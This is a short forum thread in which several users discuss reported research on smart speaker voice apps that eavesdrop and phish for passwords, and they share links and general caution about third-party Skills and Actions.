Smart speaker security weaknesses found

I don’t know whether to categorise this under STT or SN, but I guess Steve Gibson will probably pick up on it for SN anyway. So I’m posting under STT because listeners could be interested in knowing when Amazon and Google release fixes.

Researchers have found possible ways of getting some Amazon and Google speakers to keep listening after you think they’ve stopped, generate credible messages asking for personal info like passwords, and extract any responses back to the attacker. Here’s an article with details:

https://srlabs.de/bites/smart-spies/

It does appear that a developer has to create a malicious voice app that purports to add Skills/Actions to the speaker, so a bit of caution regarding third-party apps may be all that’s needed to avoid this.

1 Like

It was going to happen sooner or latter…

1 Like

I wasn’t really aware their were third party apps for Google speakers in the same way there are for Amazon Echos. Google speakers always seemed to be heavily controlled, where users couldn’t really activate apps/skills.

Could well be that it’s not a real risk with Google devices. It’s not an area I know a lot about, I was just calling attention to the report in case someone who knows more cares to assess it, after the link popped up in my Twitter feed from a security news source.

Google calls them “Actions”

You would be familiar with a couple. For a while Leo was suggesting people say “Hey google, play twit live on tune in.”

Here’s the “store”

https://assistant.google.com/explore

2 Likes

Thanks. That’s totally passed me by. Must listen to Leo more carefully :grinning: